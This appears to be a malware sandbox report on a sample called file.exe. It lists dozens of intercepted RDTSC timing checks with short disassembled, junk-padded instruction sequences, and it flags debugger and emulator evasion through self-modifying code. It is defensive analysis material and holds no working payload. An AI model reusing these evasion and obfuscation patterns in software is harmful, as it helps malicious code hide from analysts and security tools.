                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145CE4C second address: 145CE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C2Ah 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 popad 0x00000011 pushad 0x00000012 jnl 00007F11F8F18C40h 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145CFC0 second address: 145CFC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145D136 second address: 145D140 instructions: 0x00000000 rdtsc 0x00000002 je 00007F11F8F18C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AD38 second address: 146AD3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146B191 second address: 146B195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146B195 second address: 146B199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469FC1 second address: 1469FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471FDA second address: 1471FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471FE4 second address: 1471FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147191A second address: 1471939 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F11F8D5183Ch 0x00000010 pushad 0x00000011 jp 00007F11F8D51836h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471AAB second address: 1471AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471AAF second address: 1471AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D51846h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F11F8D5183Ah 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471AD5 second address: 1471AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11F8F18C37h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471AF0 second address: 1471AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471AF6 second address: 1471B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b ja 00007F11F8F18C26h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471B08 second address: 1471B12 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F11F8D5183Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D020 second address: 147D033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F11F8F18C2Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D033 second address: 147D03D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F11F8D51836h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D03D second address: 147D041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CB98 second address: 147CB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CB9C second address: 147CBA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CBA8 second address: 147CBAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CCD2 second address: 147CCF0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11F8F18C26h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jno 00007F11F8F18C26h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CCF0 second address: 147CCF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CCF4 second address: 147CCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F305 second address: 148F312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 jng 00007F11F8D51836h 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F312 second address: 148F317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F317 second address: 148F31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F31D second address: 148F338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C2Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F338 second address: 148F36B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F11F8D51842h 0x0000000f jmp 00007F11F8D51847h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F36B second address: 148F371 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149681A second address: 149681E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1496AF9 second address: 1496B04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1496B04 second address: 1496B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a je 00007F11F8D51836h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1496E20 second address: 1496E40 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11F8F18C37h 0x00000008 jmp 00007F11F8F18C2Fh 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1496E40 second address: 1496E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1496F34 second address: 1496F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1496F38 second address: 1496F7A instructions: 0x00000000 rdtsc 0x00000002 je 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F11F8D51846h 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F11F8D51842h 0x00000017 popad 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e jbe 00007F11F8D51836h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1497A35 second address: 1497A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F11F8F18C39h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A882F second address: 14A886C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51842h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jnl 00007F11F8D51836h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F11F8D51846h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AA049 second address: 14AA053 instructions: 0x00000000 rdtsc 0x00000002 je 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AA053 second address: 14AA06D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F11F8D51836h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F11F8D51836h 0x00000014 jo 00007F11F8D51836h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AA06D second address: 14AA0A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C2Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F11F8F18C39h 0x00000014 jnp 00007F11F8F18C28h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A9F03 second address: 14A9F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AD3A1 second address: 14AD3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AD3A5 second address: 14AD3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F11F8D51836h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AD3B4 second address: 14AD3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F11F8F18C26h 0x0000000a je 00007F11F8F18C26h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AD3C5 second address: 14AD3F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F11F8D5183Fh 0x0000000a jmp 00007F11F8D51844h 0x0000000f popad 0x00000010 jc 00007F11F8D5183Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BA437 second address: 14BA43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BA43B second address: 14BA446 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BA446 second address: 14BA463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C38h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BA463 second address: 14BA469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BA469 second address: 14BA46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BA46D second address: 14BA49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F11F8D5183Bh 0x0000000e jmp 00007F11F8D51848h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CC5C6 second address: 14CC5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CC5CE second address: 14CC5DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D5183Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CB48E second address: 14CB492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CB492 second address: 14CB496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CB496 second address: 14CB4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CB4A0 second address: 14CB4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CB5F8 second address: 14CB60D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CB60D second address: 14CB625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D5183Ch 0x00000009 push edi 0x0000000a pop edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CBD2E second address: 14CBD42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F11F8F18C2Eh 0x0000000c jg 00007F11F8F18C26h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CBD42 second address: 14CBD5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F11F8D51843h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CBD5B second address: 14CBDAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F11F8F18C2Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jno 00007F11F8F18C32h 0x00000014 pushad 0x00000015 jmp 00007F11F8F18C35h 0x0000001a jno 00007F11F8F18C26h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 jng 00007F11F8F18C26h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CBDAA second address: 14CBDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F11F8D51836h 0x0000000a popad 0x0000000b push edi 0x0000000c jo 00007F11F8D51836h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CEF40 second address: 14CEF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CF285 second address: 14CF289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CF289 second address: 14CF28D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CF28D second address: 14CF293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CF293 second address: 14CF2E5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F11F8F18C2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b js 00007F11F8F18C2Ch 0x00000011 xor edx, 266FEDD6h 0x00000017 push 00000004h 0x00000019 mov dl, 18h 0x0000001b mov dx, si 0x0000001e call 00007F11F8F18C29h 0x00000023 pushad 0x00000024 jno 00007F11F8F18C2Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F11F8F18C36h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CF2E5 second address: 14CF30F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007F11F8D51849h 0x0000000e jmp 00007F11F8D51843h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CF30F second address: 14CF31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F11F8F18C26h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CF31A second address: 14CF349 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11F8D5183Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F11F8D51844h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CF349 second address: 14CF34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CF34D second address: 14CF351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CF351 second address: 14CF35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F11F8F18C26h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14CF618 second address: 14CF61D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D1FBE second address: 14D1FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D1FC4 second address: 14D1FDC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jnc 00007F11F8D51836h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D1FDC second address: 14D1FE6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D1FE6 second address: 14D1FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D3E06 second address: 14D3E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C2Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11F8F18C32h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14D3E2E second address: 14D3E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F11F8D5183Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F11F8D51836h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0257 second address: 54D027E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F11F8F18C39h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D027E second address: 54D029A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51841h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D029A second address: 54D029E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D029E second address: 54D02A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0341 second address: 54D035E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D035E second address: 54D0365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0365 second address: 54D037E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F11F8F18C2Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D037E second address: 54D03AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51849h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11F8D5183Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D03AB second address: 54D03B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D03B1 second address: 54D03B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D03B5 second address: 54D03EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F11F8F18C36h 0x00000012 pop ebp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cl, 11h 0x00000018 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12419BA instructions caused by: Self-modifying code
